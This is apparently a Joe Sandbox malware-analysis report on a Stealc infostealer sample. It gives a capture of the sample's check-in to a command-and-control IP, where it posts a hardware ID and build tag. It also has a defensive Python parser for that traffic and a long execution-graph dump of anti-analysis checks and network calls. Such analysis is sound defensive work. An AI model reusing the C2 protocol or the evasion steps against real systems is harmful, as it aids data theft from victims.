Oct 27, 2024 01:47:07.638756990 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 01:47:10.678854942 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                    • 185.215.113.206
HTTP sessions (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process):
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7284 | C:\Users\user\Desktop\file.exe
HTTP traffic on session 0 (Timestamp | Bytes transferred | Direction, followed by the data):

Oct 27, 2024 01:47:06.429724932 CEST | 90 | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 27, 2024 01:47:07.345360041 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 23:47:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 27, 2024 01:47:07.348097086 CEST | 412 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 37 39 33 33 44 45 31 46 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------EBKKKEGIDBGHIDGDHDBF
Content-Disposition: form-data; name="hwid"

9A7933DE1F39786254513
------EBKKKEGIDBGHIDGDHDBF
Content-Disposition: form-data; name="build"

puma
------EBKKKEGIDBGHIDGDHDBF--

Oct 27, 2024 01:47:07.638669968 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 23:47:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

Neither request carries a User-Agent header. The 210-byte POST body is a two-field multipart form: hwid (the victim identifier 9A7933DE1F39786254513) and build (the campaign tag puma). The 8-byte reply YmxvY2s= is base64 for the string "block"; no further HTTP exchange with the server is recorded in this session.
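The check-in exchange above, as a parser a triage analyst can run over the captured bytes: it pulls the boundary from the Content-Type header, splits the multipart body into its form fields, and base64-decodes the server's reply. This is an added example, not code from the report or from the malware; the request body and the reply are reconstructed from the report's Data Ascii and Data Raw fields, and the field set that looks_like_checkin tests for (a hex-looking hwid plus a build tag) is this example's assumption, not the content of the Suricata rule that fired.

```python
"""Parse the captured Stealc check-in and decode the server's reply.

Added example, not part of the Joe Sandbox report. The POST body and the
reply are reconstructed from the report's Data Ascii / Data Raw fields; the
field set checked by looks_like_checkin is this example's own assumption.
"""
from __future__ import annotations

import base64
import binascii
import re

CONTENT_TYPE = "multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF"

# POST body, CRLF-delimited exactly as in the captured "Data Raw" bytes (Content-Length: 210).
POST_BODY = b"\r\n".join([
    b"------EBKKKEGIDBGHIDGDHDBF",
    b'Content-Disposition: form-data; name="hwid"',
    b"",
    b"9A7933DE1F39786254513",
    b"------EBKKKEGIDBGHIDGDHDBF",
    b'Content-Disposition: form-data; name="build"',
    b"",
    b"puma",
    b"------EBKKKEGIDBGHIDGDHDBF--",
    b"",
])

# The 8-byte reply body of the second 200 OK ("Data Raw: 59 6d 78 76 59 32 73 3d").
RESPONSE_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")


def parse_multipart(content_type: str, body: bytes) -> dict[str, bytes]:
    """Return name -> value for every form-data part, with the CRLF framing removed."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if not m:
        raise ValueError("no boundary parameter in Content-Type")
    delimiter = b"--" + m.group(1).encode()
    fields: dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:      # element [0] is the (empty) preamble
        if part.startswith(b"--"):              # closing delimiter "--\r\n": done
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                            # malformed part without a header/body split
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_response(body: bytes) -> str:
    """The C2 answers with base64 text; reject anything that is not clean base64."""
    try:
        return base64.b64decode(body, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"reply is not base64 text: {body!r}") from exc


def looks_like_checkin(fields: dict[str, bytes]) -> bool:
    """Shape seen in this capture: exactly hwid + build, hwid upper-case hex (assumption)."""
    return (set(fields) == {"hwid", "build"}
            and re.fullmatch(rb"[0-9A-F]{16,}", fields["hwid"]) is not None)


def summarize(content_type: str, body: bytes, response: bytes) -> dict[str, str]:
    """Decode request fields and reply into one record for the analyst."""
    fields = {k: v.decode() for k, v in parse_multipart(content_type, body).items()}
    fields["reply"] = decode_response(response)
    return fields


if __name__ == "__main__":
    print(summarize(CONTENT_TYPE, POST_BODY, RESPONSE_BODY))
```

The reconstructed body is 210 bytes, matching the Content-Length the sample sent, and the reply decodes to "block". Splitting on the full "--boundary" delimiter rather than on the boundary string alone is what keeps the closing "--boundary--" from being parsed as a third part.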



                                    Target ID:0
                                    Start time:19:47:03
                                    Start date:26/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0x520000
                                    File size:1'865'728 bytes
                                    MD5 hash:A2D11B8A418D4D4F4653FFD4AF70D5C7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:8.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:9.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:25
execution_graph, rendered as call chains recovered from the graph dump (numeric node ids dropped; addresses and API names kept; "a -> b" is an edge from a to b, "or" marks a branch). The dump is cut off mid-edge inside the 5226a0 chain, so later edges are incomplete.

Entry and API resolution (5369f0):
  5369f0 -> 522260 -> a run of sequential calls to 5245c0 (522274, 52228d, ... 52268e); 5245c0 is "2 API calls": 5245d1 RtlAllocateHeap -> 524621 VirtualProtect
  52268e -> 539860 -> 539750 GetPEB -> 539868
  539868 -> 539a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA (directly, or via 53987a -> 53988c, 21 API calls)
  539a93 -> 539af4 GetProcAddress -> 539b0d, or 539b0d directly
  539b0d -> 539b16 GetProcAddress GetProcAddress -> 539b46, or 539b46 directly
  539b46 -> 539b4f GetProcAddress -> 539b68, or 539b68 directly
  539b68 -> 539b71 GetProcAddress -> 539b89, or 539b89 directly
  539b89 -> 539b92 GetProcAddress GetProcAddress -> 536a00, or 536a00 directly

Start-up checks, each with an ExitProcess branch:
  536a00 -> 53a740 -> 53a750 -> 536a0d (or 53a77e lstrcpy -> 536a0d)
  536a0d -> 5211d0 -> 5211e8 -> 521217, or 52120f ExitProcess
  521217 -> 521160 GetSystemInfo -> 521184, or 52117c ExitProcess
  521184 -> 521110 GetCurrentProcess VirtualAllocExNuma -> 521149, or 521141 ExitProcess
  521149 -> 5210a0 VirtualAlloc -> 5210c2 ctype -> 5210fd (or 5210e2 VirtualFree -> 5210fd) -> 521220
  521220 -> 5389b0 -> 521233 GlobalMemoryStatusEx -> 521249 __aulldiv -> 52129a, or 521292 ExitProcess
  52129a -> 536770 GetUserDefaultLangID -> 5367d3, or 536792 -> 5367d3 or ExitProcess at 5367a3, 5367ad, 5367b7, 5367c1, 5367cb
  5367d3 -> 521190 -> 5378e0 (3 API calls) -> 52119e -> 5211cc, or 537850 (3 API calls) -> 5211b7 -> 5211cc or 5211c4 ExitProcess

Host identifiers and named event:
  5211cc -> 537850 GetProcessHeap RtlAllocateHeap GetUserNameA -> 536a30
  536a30 -> 5378e0 GetProcessHeap RtlAllocateHeap GetComputerNameA -> 536a43
  536a43 -> 53a9b0 -> 536a64 -> 53a9b0 -> 536a6b -> 53a9b0 -> 536a72 -> 53a9b0 -> 536a79 -> 53a9b0 -> 536a80 -> 53a8a0 -> 536a89
    (53a9b0, "4 API calls": 53a710 -> 53a9c1 lstrlen -> 53a9e0 -> 53aa18 or 53a9fa lstrcpy lstrcat -> 53aa18 -> 53a7a0 -> 53a7c2 -> 53a7ec or 53a7da lstrcpy; 53a8a0: 53a8bb -> 53a90b or 53a8f9 lstrcpy)
  536a89 -> 536ac2 OpenEventA -> 536af5 CloseHandle Sleep -> 536b0a -> 536a89 (retry loop), or 536ad9 -> 536ae1 CreateEventA -> 536b0c; 536a89 -> 536b0c

System-time check:
  536b0c -> 536920 GetSystemTime -> 536820 (string building: 53a740 lstrcpy, then alternating 53a9b0 / 53a8a0 lstrcpy through 536833 ... 5368fc, then 53a7a0 lstrcpy -> 536910) -> 53698e
  53698e -> 536998 sscanf -> 53a800 -> 53a812 -> 5369aa SystemTimeToFileTime SystemTimeToFileTime -> 5369e0, or 5369ce -> 5369e0 or 5369d8 ExitProcess

Collection routines (5369e0 -> 535b10):
  535b10 -> 535b1d -> 53a740 lstrcpy -> 535b2e -> 53a820 lstrlen (53a83f -> 535b54, or 53a87b lstrcpy) -> 535b54 -> 53a820 -> 535b64 -> 53a820 -> 535b74 -> 536430 (four 53a8a0 lstrcpy calls: 536443, 536455, 536467) -> 535b86
  535b86 -> 53a820 -> 535b93 -> 53a820 -> 535ba0 -> 53a820 -> 535bad -> 53a820 -> 535bf9 -> 5226a0
  5226a0 -> a long run of sequential calls to 5245c0 (5226b4, 5226d7, ... 523bcc; the dump breaks off here)
  535cc3 -> 536430 lstrcpy -> 535cd5 -> 53a7a0 lstrcpy -> 535cf2 -> 53a9b0 (4 API calls) -> 535d0a -> 53a8a0 lstrcpy -> 535d16 -> 53a9b0 -> 535d3a -> 53a8a0 -> 535d46 -> 53a9b0 -> 535d6a -> 53a8a0 -> 535d76 -> 53a740 lstrcpy -> 535d9e
  535d9e -> 537500 GetWindowsDirectoryA -> 53a7a0 lstrcpy -> 535db8 -> 524880 -> 535dbe -> 5317a0 -> 535dc6
  535dc6 -> 53a740 lstrcpy -> 535de9 -> 521590 lstrcpy -> 535dfd -> 525960 -> 535e03 -> 531050 -> 535e0e
  535e0e -> 53a740 lstrcpy -> 535e32 -> 521590 lstrcpy -> 535e46 -> 525960 (34 API calls) -> 535e4c -> 530d90 -> 535e57
  535e57 -> 53a740 lstrcpy -> 535e79 -> 521590 lstrcpy -> 535e8d -> 525960 (34 API calls) -> 535e93 -> 530f40 -> 535e9e -> 521590 lstrcpy -> 535eb5 -> 531a10 -> 535eba
  535eba -> 53a740 lstrcpy -> 535ed6 -> 524fb0 GetProcessHeap RtlAllocateHeap InternetOpenA -> 535edb -> 521590 lstrcpy -> 535f5b -> 530740 -> 535f60
  535f60 -> 53a740 lstrcpy -> 535f86 -> 521590 lstrcpy -> 535f9a -> 525960 (34 API calls) -> 535fa0
API calls 13941->13942 13943 523be5 13942->13943 13944 5245c0 2 API calls 13943->13944 13945 523bfe 13944->13945 13946 5245c0 2 API calls 13945->13946 13947 523c17 13946->13947 13948 5245c0 2 API calls 13947->13948 13949 523c30 13948->13949 13950 5245c0 2 API calls 13949->13950 13951 523c49 13950->13951 13952 5245c0 2 API calls 13951->13952 13953 523c62 13952->13953 13954 5245c0 2 API calls 13953->13954 13955 523c7b 13954->13955 13956 5245c0 2 API calls 13955->13956 13957 523c94 13956->13957 13958 5245c0 2 API calls 13957->13958 13959 523cad 13958->13959 13960 5245c0 2 API calls 13959->13960 13961 523cc6 13960->13961 13962 5245c0 2 API calls 13961->13962 13963 523cdf 13962->13963 13964 5245c0 2 API calls 13963->13964 13965 523cf8 13964->13965 13966 5245c0 2 API calls 13965->13966 13967 523d11 13966->13967 13968 5245c0 2 API calls 13967->13968 13969 523d2a 13968->13969 13970 5245c0 2 API calls 13969->13970 13971 523d43 13970->13971 13972 5245c0 2 API calls 13971->13972 13973 523d5c 13972->13973 13974 5245c0 2 API calls 13973->13974 13975 523d75 13974->13975 13976 5245c0 2 API calls 13975->13976 13977 523d8e 13976->13977 13978 5245c0 2 API calls 13977->13978 13979 523da7 13978->13979 13980 5245c0 2 API calls 13979->13980 13981 523dc0 13980->13981 13982 5245c0 2 API calls 13981->13982 13983 523dd9 13982->13983 13984 5245c0 2 API calls 13983->13984 13985 523df2 13984->13985 13986 5245c0 2 API calls 13985->13986 13987 523e0b 13986->13987 13988 5245c0 2 API calls 13987->13988 13989 523e24 13988->13989 13990 5245c0 2 API calls 13989->13990 13991 523e3d 13990->13991 13992 5245c0 2 API calls 13991->13992 13993 523e56 13992->13993 13994 5245c0 2 API calls 13993->13994 13995 523e6f 13994->13995 13996 5245c0 2 API calls 13995->13996 13997 523e88 13996->13997 13998 5245c0 2 API calls 13997->13998 13999 523ea1 13998->13999 14000 5245c0 2 API calls 13999->14000 14001 523eba 14000->14001 14002 5245c0 2 API calls 14001->14002 14003 523ed3 14002->14003 14004 5245c0 2 API calls 
14003->14004 14005 523eec 14004->14005 14006 5245c0 2 API calls 14005->14006 14007 523f05 14006->14007 14008 5245c0 2 API calls 14007->14008 14009 523f1e 14008->14009 14010 5245c0 2 API calls 14009->14010 14011 523f37 14010->14011 14012 5245c0 2 API calls 14011->14012 14013 523f50 14012->14013 14014 5245c0 2 API calls 14013->14014 14015 523f69 14014->14015 14016 5245c0 2 API calls 14015->14016 14017 523f82 14016->14017 14018 5245c0 2 API calls 14017->14018 14019 523f9b 14018->14019 14020 5245c0 2 API calls 14019->14020 14021 523fb4 14020->14021 14022 5245c0 2 API calls 14021->14022 14023 523fcd 14022->14023 14024 5245c0 2 API calls 14023->14024 14025 523fe6 14024->14025 14026 5245c0 2 API calls 14025->14026 14027 523fff 14026->14027 14028 5245c0 2 API calls 14027->14028 14029 524018 14028->14029 14030 5245c0 2 API calls 14029->14030 14031 524031 14030->14031 14032 5245c0 2 API calls 14031->14032 14033 52404a 14032->14033 14034 5245c0 2 API calls 14033->14034 14035 524063 14034->14035 14036 5245c0 2 API calls 14035->14036 14037 52407c 14036->14037 14038 5245c0 2 API calls 14037->14038 14039 524095 14038->14039 14040 5245c0 2 API calls 14039->14040 14041 5240ae 14040->14041 14042 5245c0 2 API calls 14041->14042 14043 5240c7 14042->14043 14044 5245c0 2 API calls 14043->14044 14045 5240e0 14044->14045 14046 5245c0 2 API calls 14045->14046 14047 5240f9 14046->14047 14048 5245c0 2 API calls 14047->14048 14049 524112 14048->14049 14050 5245c0 2 API calls 14049->14050 14051 52412b 14050->14051 14052 5245c0 2 API calls 14051->14052 14053 524144 14052->14053 14054 5245c0 2 API calls 14053->14054 14055 52415d 14054->14055 14056 5245c0 2 API calls 14055->14056 14057 524176 14056->14057 14058 5245c0 2 API calls 14057->14058 14059 52418f 14058->14059 14060 5245c0 2 API calls 14059->14060 14061 5241a8 14060->14061 14062 5245c0 2 API calls 14061->14062 14063 5241c1 14062->14063 14064 5245c0 2 API calls 14063->14064 14065 5241da 14064->14065 14066 5245c0 2 API calls 14065->14066 
14067 5241f3 14066->14067 14068 5245c0 2 API calls 14067->14068 14069 52420c 14068->14069 14070 5245c0 2 API calls 14069->14070 14071 524225 14070->14071 14072 5245c0 2 API calls 14071->14072 14073 52423e 14072->14073 14074 5245c0 2 API calls 14073->14074 14075 524257 14074->14075 14076 5245c0 2 API calls 14075->14076 14077 524270 14076->14077 14078 5245c0 2 API calls 14077->14078 14079 524289 14078->14079 14080 5245c0 2 API calls 14079->14080 14081 5242a2 14080->14081 14082 5245c0 2 API calls 14081->14082 14083 5242bb 14082->14083 14084 5245c0 2 API calls 14083->14084 14085 5242d4 14084->14085 14086 5245c0 2 API calls 14085->14086 14087 5242ed 14086->14087 14088 5245c0 2 API calls 14087->14088 14089 524306 14088->14089 14090 5245c0 2 API calls 14089->14090 14091 52431f 14090->14091 14092 5245c0 2 API calls 14091->14092 14093 524338 14092->14093 14094 5245c0 2 API calls 14093->14094 14095 524351 14094->14095 14096 5245c0 2 API calls 14095->14096 14097 52436a 14096->14097 14098 5245c0 2 API calls 14097->14098 14099 524383 14098->14099 14100 5245c0 2 API calls 14099->14100 14101 52439c 14100->14101 14102 5245c0 2 API calls 14101->14102 14103 5243b5 14102->14103 14104 5245c0 2 API calls 14103->14104 14105 5243ce 14104->14105 14106 5245c0 2 API calls 14105->14106 14107 5243e7 14106->14107 14108 5245c0 2 API calls 14107->14108 14109 524400 14108->14109 14110 5245c0 2 API calls 14109->14110 14111 524419 14110->14111 14112 5245c0 2 API calls 14111->14112 14113 524432 14112->14113 14114 5245c0 2 API calls 14113->14114 14115 52444b 14114->14115 14116 5245c0 2 API calls 14115->14116 14117 524464 14116->14117 14118 5245c0 2 API calls 14117->14118 14119 52447d 14118->14119 14120 5245c0 2 API calls 14119->14120 14121 524496 14120->14121 14122 5245c0 2 API calls 14121->14122 14123 5244af 14122->14123 14124 5245c0 2 API calls 14123->14124 14125 5244c8 14124->14125 14126 5245c0 2 API calls 14125->14126 14127 5244e1 14126->14127 14128 5245c0 2 API calls 14127->14128 14129 5244fa 
14128->14129 14130 5245c0 2 API calls 14129->14130 14131 524513 14130->14131 14132 5245c0 2 API calls 14131->14132 14133 52452c 14132->14133 14134 5245c0 2 API calls 14133->14134 14135 524545 14134->14135 14136 5245c0 2 API calls 14135->14136 14137 52455e 14136->14137 14138 5245c0 2 API calls 14137->14138 14139 524577 14138->14139 14140 5245c0 2 API calls 14139->14140 14141 524590 14140->14141 14142 5245c0 2 API calls 14141->14142 14143 5245a9 14142->14143 14144 539c10 14143->14144 14145 539c20 43 API calls 14144->14145 14146 53a036 8 API calls 14144->14146 14145->14146 14147 53a146 14146->14147 14148 53a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14146->14148 14149 53a153 8 API calls 14147->14149 14150 53a216 14147->14150 14148->14147 14149->14150 14151 53a298 14150->14151 14152 53a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14150->14152 14153 53a337 14151->14153 14154 53a2a5 6 API calls 14151->14154 14152->14151 14155 53a344 9 API calls 14153->14155 14156 53a41f 14153->14156 14154->14153 14155->14156 14157 53a4a2 14156->14157 14158 53a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14156->14158 14159 53a4ab GetProcAddress GetProcAddress 14157->14159 14160 53a4dc 14157->14160 14158->14157 14159->14160 14161 53a515 14160->14161 14162 53a4e5 GetProcAddress GetProcAddress 14160->14162 14163 53a612 14161->14163 14164 53a522 10 API calls 14161->14164 14162->14161 14165 53a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14163->14165 14166 53a67d 14163->14166 14164->14163 14165->14166 14167 53a686 GetProcAddress 14166->14167 14168 53a69e 14166->14168 14167->14168 14169 53a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14168->14169 14170 535ca3 14168->14170 14169->14170 14171 521590 14170->14171 15292 521670 14171->15292 14174 53a7a0 lstrcpy 14175 5215b5 14174->14175 14176 53a7a0 lstrcpy 14175->14176 14177 5215c7 14176->14177 14178 53a7a0 
lstrcpy 14177->14178 14179 5215d9 14178->14179 14180 53a7a0 lstrcpy 14179->14180 14181 521663 14180->14181 14182 535510 14181->14182 14183 535521 14182->14183 14184 53a820 2 API calls 14183->14184 14185 53552e 14184->14185 14186 53a820 2 API calls 14185->14186 14187 53553b 14186->14187 14188 53a820 2 API calls 14187->14188 14189 535548 14188->14189 14190 53a740 lstrcpy 14189->14190 14191 535555 14190->14191 14192 53a740 lstrcpy 14191->14192 14193 535562 14192->14193 14194 53a740 lstrcpy 14193->14194 14195 53556f 14194->14195 14196 53a740 lstrcpy 14195->14196 14236 53557c 14196->14236 14197 5351f0 20 API calls 14197->14236 14198 535643 StrCmpCA 14198->14236 14199 5356a0 StrCmpCA 14200 5357dc 14199->14200 14199->14236 14201 53a8a0 lstrcpy 14200->14201 14202 5357e8 14201->14202 14204 53a820 2 API calls 14202->14204 14203 521590 lstrcpy 14203->14236 14207 5357f6 14204->14207 14205 53a740 lstrcpy 14205->14236 14206 53a820 lstrlen lstrcpy 14206->14236 14209 53a820 2 API calls 14207->14209 14208 535856 StrCmpCA 14210 535991 14208->14210 14208->14236 14214 535805 14209->14214 14213 53a8a0 lstrcpy 14210->14213 14211 53a7a0 lstrcpy 14211->14236 14212 53a8a0 lstrcpy 14212->14236 14215 53599d 14213->14215 14216 521670 lstrcpy 14214->14216 14217 53a820 2 API calls 14215->14217 14234 535811 14216->14234 14218 5359ab 14217->14218 14220 53a820 2 API calls 14218->14220 14219 535a0b StrCmpCA 14221 535a16 Sleep 14219->14221 14222 535a28 14219->14222 14223 5359ba 14220->14223 14221->14236 14224 53a8a0 lstrcpy 14222->14224 14225 521670 lstrcpy 14223->14225 14226 535a34 14224->14226 14225->14234 14227 53a820 2 API calls 14226->14227 14228 535a43 14227->14228 14230 53a820 2 API calls 14228->14230 14229 5352c0 25 API calls 14229->14236 14231 535a52 14230->14231 14233 521670 lstrcpy 14231->14233 14232 53578a StrCmpCA 14232->14236 14233->14234 14234->13289 14235 53593f StrCmpCA 14235->14236 14236->14197 14236->14198 14236->14199 14236->14203 14236->14205 14236->14206 14236->14208 
14236->14211 14236->14212 14236->14219 14236->14229 14236->14232 14236->14235 14238 537553 GetVolumeInformationA 14237->14238 14239 53754c 14237->14239 14244 537591 14238->14244 14239->14238 14240 5375fc GetProcessHeap RtlAllocateHeap 14241 537619 14240->14241 14242 537628 wsprintfA 14240->14242 14245 53a740 lstrcpy 14241->14245 14243 53a740 lstrcpy 14242->14243 14246 535da7 14243->14246 14244->14240 14245->14246 14246->13310 14248 53a7a0 lstrcpy 14247->14248 14249 524899 14248->14249 15301 5247b0 14249->15301 14251 5248a5 14252 53a740 lstrcpy 14251->14252 14253 5248d7 14252->14253 14254 53a740 lstrcpy 14253->14254 14255 5248e4 14254->14255 14256 53a740 lstrcpy 14255->14256 14257 5248f1 14256->14257 14258 53a740 lstrcpy 14257->14258 14259 5248fe 14258->14259 14260 53a740 lstrcpy 14259->14260 14261 52490b InternetOpenA StrCmpCA 14260->14261 14262 524944 14261->14262 14263 524ecb InternetCloseHandle 14262->14263 15307 538b60 14262->15307 14264 524ee8 14263->14264 15321 529ac0 CryptStringToBinaryA 14264->15321 14266 524963 15315 53a920 14266->15315 14269 524976 14271 53a8a0 lstrcpy 14269->14271 14276 52497f 14271->14276 14272 53a820 2 API calls 14273 524f05 14272->14273 14275 53a9b0 4 API calls 14273->14275 14274 524f27 ctype 14278 53a7a0 lstrcpy 14274->14278 14277 524f1b 14275->14277 14280 53a9b0 4 API calls 14276->14280 14279 53a8a0 lstrcpy 14277->14279 14291 524f57 14278->14291 14279->14274 14281 5249a9 14280->14281 14282 53a8a0 lstrcpy 14281->14282 14283 5249b2 14282->14283 14284 53a9b0 4 API calls 14283->14284 14285 5249d1 14284->14285 14286 53a8a0 lstrcpy 14285->14286 14287 5249da 14286->14287 14288 53a920 3 API calls 14287->14288 14289 5249f8 14288->14289 14290 53a8a0 lstrcpy 14289->14290 14292 524a01 14290->14292 14291->13313 14293 53a9b0 4 API calls 14292->14293 14294 524a20 14293->14294 14295 53a8a0 lstrcpy 14294->14295 14296 524a29 14295->14296 14297 53a9b0 4 API calls 14296->14297 14298 524a48 14297->14298 14299 53a8a0 lstrcpy 14298->14299 14300 524a51 
14299->14300 14301 53a9b0 4 API calls 14300->14301 14302 524a7d 14301->14302 14303 53a920 3 API calls 14302->14303 14304 524a84 14303->14304 14305 53a8a0 lstrcpy 14304->14305 14306 524a8d 14305->14306 14307 524aa3 InternetConnectA 14306->14307 14307->14263 14308 524ad3 HttpOpenRequestA 14307->14308 14310 524b28 14308->14310 14311 524ebe InternetCloseHandle 14308->14311 14312 53a9b0 4 API calls 14310->14312 14311->14263 14313 524b3c 14312->14313 14314 53a8a0 lstrcpy 14313->14314 14315 524b45 14314->14315 14316 53a920 3 API calls 14315->14316 14317 524b63 14316->14317 14318 53a8a0 lstrcpy 14317->14318 14319 524b6c 14318->14319 14320 53a9b0 4 API calls 14319->14320 14321 524b8b 14320->14321 14322 53a8a0 lstrcpy 14321->14322 14323 524b94 14322->14323 14324 53a9b0 4 API calls 14323->14324 14325 524bb5 14324->14325 14326 53a8a0 lstrcpy 14325->14326 14327 524bbe 14326->14327 14328 53a9b0 4 API calls 14327->14328 14329 524bde 14328->14329 14330 53a8a0 lstrcpy 14329->14330 14331 524be7 14330->14331 14332 53a9b0 4 API calls 14331->14332 14333 524c06 14332->14333 14334 53a8a0 lstrcpy 14333->14334 14335 524c0f 14334->14335 14336 53a920 3 API calls 14335->14336 14337 524c2d 14336->14337 14338 53a8a0 lstrcpy 14337->14338 14339 524c36 14338->14339 14340 53a9b0 4 API calls 14339->14340 14341 524c55 14340->14341 14342 53a8a0 lstrcpy 14341->14342 14343 524c5e 14342->14343 14344 53a9b0 4 API calls 14343->14344 14345 524c7d 14344->14345 14346 53a8a0 lstrcpy 14345->14346 14347 524c86 14346->14347 14348 53a920 3 API calls 14347->14348 14349 524ca4 14348->14349 14350 53a8a0 lstrcpy 14349->14350 14351 524cad 14350->14351 14352 53a9b0 4 API calls 14351->14352 14353 524ccc 14352->14353 14354 53a8a0 lstrcpy 14353->14354 14355 524cd5 14354->14355 14356 53a9b0 4 API calls 14355->14356 14357 524cf6 14356->14357 14358 53a8a0 lstrcpy 14357->14358 14359 524cff 14358->14359 14360 53a9b0 4 API calls 14359->14360 14361 524d1f 14360->14361 14362 53a8a0 lstrcpy 14361->14362 14363 524d28 14362->14363 
14364 53a9b0 4 API calls 14363->14364 14365 524d47 14364->14365 14366 53a8a0 lstrcpy 14365->14366 14367 524d50 14366->14367 14368 53a920 3 API calls 14367->14368 14369 524d6e 14368->14369 14370 53a8a0 lstrcpy 14369->14370 14371 524d77 14370->14371 14372 53a740 lstrcpy 14371->14372 14373 524d92 14372->14373 14374 53a920 3 API calls 14373->14374 14375 524db3 14374->14375 14376 53a920 3 API calls 14375->14376 14377 524dba 14376->14377 14378 53a8a0 lstrcpy 14377->14378 14379 524dc6 14378->14379 14380 524de7 lstrlen 14379->14380 14381 524dfa 14380->14381 14382 524e03 lstrlen 14381->14382 15326 53aad0 14382->15326 14384 524e13 HttpSendRequestA 14385 524e32 InternetReadFile 14384->14385 14386 524e67 InternetCloseHandle 14385->14386 14391 524e5e 14385->14391 14389 53a800 14386->14389 14388 53a9b0 4 API calls 14388->14391 14389->14311 14390 53a8a0 lstrcpy 14390->14391 14391->14385 14391->14386 14391->14388 14391->14390 15328 53aad0 14392->15328 14394 5317c4 StrCmpCA 14395 5317cf ExitProcess 14394->14395 14396 5317d7 14394->14396 14397 531913 StrCmpCA 14396->14397 14398 531932 StrCmpCA 14396->14398 14399 5318f1 StrCmpCA 14396->14399 14400 531951 StrCmpCA 14396->14400 14401 531970 StrCmpCA 14396->14401 14402 53187f StrCmpCA 14396->14402 14403 53185d StrCmpCA 14396->14403 14404 5318cf StrCmpCA 14396->14404 14405 5318ad StrCmpCA 14396->14405 14406 5319c2 14396->14406 14407 53a820 lstrlen lstrcpy 14396->14407 14397->14396 14398->14396 14399->14396 14400->14396 14401->14396 14402->14396 14403->14396 14404->14396 14405->14396 14406->13315 14407->14396 14409 53a7a0 lstrcpy 14408->14409 14410 525979 14409->14410 14411 5247b0 2 API calls 14410->14411 14412 525985 14411->14412 14413 53a740 lstrcpy 14412->14413 14414 5259ba 14413->14414 14415 53a740 lstrcpy 14414->14415 14416 5259c7 14415->14416 14417 53a740 lstrcpy 14416->14417 14418 5259d4 14417->14418 14419 53a740 lstrcpy 14418->14419 14420 5259e1 14419->14420 14421 53a740 lstrcpy 14420->14421 14422 5259ee InternetOpenA StrCmpCA 
